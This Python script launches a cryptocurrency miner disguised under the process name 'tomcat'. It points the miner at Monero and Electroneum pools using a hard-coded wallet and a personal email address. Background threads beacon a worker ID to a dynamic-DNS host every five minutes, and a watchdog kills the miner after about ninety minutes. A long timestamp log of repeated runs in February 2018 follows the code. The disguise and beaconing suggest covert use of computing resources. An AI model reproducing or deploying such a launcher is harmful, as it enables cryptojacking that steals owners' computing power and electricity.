import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:05.369733
#2018-02-17 16:11:01.755091
#2018-02-17 17:58:03.790620
#2018-02-17 19:45:07.241820
#2018-02-17 21:32:06.310975
#2018-02-17 23:16:06.660537
#2018-02-18 01:03:05.331344
#2018-02-18 02:51:06.948158
#2018-02-18 04:41:04.876231
#2018-02-18 06:33:01.938162
#2018-02-18 08:20:08.373845
#2018-02-18 10:09:02.082851
#2018-02-18 11:55:05.725539
#2018-02-18 13:40:06.696452
#2018-02-18 15:31:07.351004
#2018-02-18 17:19:06.568028
#2018-02-18 19:08:05.422205
#2018-02-18 20:54:03.953056
#2018-02-18 22:39:07.292453
#2018-02-19 00:28:06.564969
#2018-02-19 02:12:06.030076
#2018-02-19 03:58:06.475892
#2018-02-19 05:42:02.512000
#2018-02-19 07:29:06.027295
#2018-02-19 09:19:03.825238
#2018-02-19 11:08:09.103522
#2018-02-19 12:55:01.654520
#2018-02-19 14:43:07.130003
#2018-02-19 16:32:04.350880
#2018-02-19 18:17:08.625608
#2018-02-19 20:04:05.727308
#2018-02-19 21:54:01.758772
#2018-02-19 23:40:07.866022
#2018-02-20 01:27:03.981795
#2018-02-20 03:16:06.495002
#2018-02-20 05:03:02.061113
#2018-02-20 06:45:07.969633
#2018-02-20 08:31:08.037360
#2018-02-20 10:15:09.001561
#2018-02-20 11:59:09.784521
#2018-02-20 13:47:06.989564
#2018-02-20 15:30:05.081737
#2018-02-20 17:15:03.915712
#2018-02-20 19:06:05.766497
#2018-02-20 20:53:07.045920
#2018-02-20 22:37:04.136466
#2018-02-21 00:18:02.086541
#2018-02-21 02:04:05.036111
#2018-02-21 03:50:02.083985
#2018-02-21 05:38:06.166393
#2018-02-21 07:27:03.666510
#2018-02-21 09:11:04.464104
#2018-02-21 10:59:06.181679
#2018-02-21 12:45:02.768344
#2018-02-21 14:33:10.072424
#2018-02-21 16:21:01.440964
#2018-02-21 18:12:01.803415
#2018-02-21 19:57:07.531467
#2018-02-21 21:46:06.195339
#2018-02-21 23:34:01.197917
#2018-02-22 01:22:02.188980
#2018-02-22 03:10:09.334174
#2018-02-22 04:54:04.226087
#2018-02-22 06:39:05.683611
#2018-02-22 08:27:06.687754
#2018-02-22 10:14:05.203994
#2018-02-22 11:59:05.971664
#2018-02-22 13:45:06.846806
#2018-02-22 15:33:05.875435
#2018-02-22 17:19:07.292341
#2018-02-22 19:06:08.753827
#2018-02-22 20:57:09.039923
#2018-02-22 22:42:06.923765
#2018-02-23 00:29:07.339259
#2018-02-23 02:16:04.321472
#2018-02-23 04:05:08.785261
#2018-02-23 05:52:05.211541
#2018-02-23 07:40:07.718750
#2018-02-23 09:43:06.441510
#2018-02-23 11:48:01.975459
#2018-02-23 13:38:03.889188
#2018-02-23 15:26:05.972241
#2018-02-23 17:16:10.375560
#2018-02-23 18:59:03.969930
#2018-02-23 20:46:07.364018
#2018-02-23 22:31:07.106235
#2018-02-24 00:17:01.442269
#2018-02-24 02:07:06.847407
#2018-02-24 03:57:05.500042
#2018-02-24 05:42:07.663881
#2018-02-24 07:33:05.330463
#2018-02-24 09:19:05.212694
#2018-02-24 11:07:07.388847
#2018-02-24 12:55:07.161230
#2018-02-24 14:44:07.372808
#2018-02-24 16:36:05.799827
#2018-02-24 18:25:08.220244
#2018-02-24 20:12:05.775394
#2018-02-24 21:57:05.953925
#2018-02-25 00:57:04.141482
#2018-02-25 04:39:06.826006
#2018-02-25 08:05:06.538445